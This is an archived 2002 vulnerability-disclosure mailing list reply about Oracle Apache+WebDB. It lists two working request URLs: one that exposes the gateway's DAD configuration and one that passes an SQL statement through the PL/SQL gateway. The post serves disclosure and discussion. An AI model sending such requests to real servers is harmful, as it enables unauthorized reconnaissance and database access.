Vulnerability Development mailing list archives
Re: Correction - Oracle Apache+WebDB info leakege
From: "Scalise, Marzio" <marzioscalise () KPMG it>
Date: Mon, 4 Feb 2002 17:03:55 +0100
While I was going through the Oracle Apache+WebDB vulnerability, I found something else also interesting, I don't know if anyone has posted this before, but here it
goes
any way.
If you reques the following: http://<hostname>:<port>/pls/admin The following info is displayed: Sun, 3 Feb 2002 19:57:12 GMT No DAD configuration Found DAD name: PROCEDURE : URL : http://<hostname>:<port>/pls/admin PARAMETERS : =========== ENVIRONMENT: ============ PLSQL_GATEWAY=WebDb GATEWAY_IVERSION=2 SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22
[CUT...] Hi Yes, Michal Zalewski has posted this bug. http://www.securityfocus.com/archive/1/153186 There are 2 bug for Web DB. 1) you can "view" the DAD configuration on the Database server: http://<host>/pls/<name_of_dad>/admin_/gateway.htm 2) the oracle webdb accept a PL-SQL procedure on the web, for example if you write in the browser: http://<hostname>:<port>/pls/<name_of_dad>/select%09*%09from%09cat%01 the following info is displayed: ORA-06550 row 7 PLS-00428 A INTO clause waited in this instruction .. (sorry i have webdb in italian and i translate word by word) PL/SQL: SQL statement ignored hope this help Marzio Scalise Information Risk Management KPMG S.p.A. pgp key is available at: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x606359A9 ************************************************************************** The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter. **************************************************************************
Current thread:
- Correction - Oracle Apache+WebDB info leakege Leandro Malaquias (Feb 03)
- <Possible follow-ups>
- Re: Correction - Oracle Apache+WebDB info leakege Scalise, Marzio (Feb 04)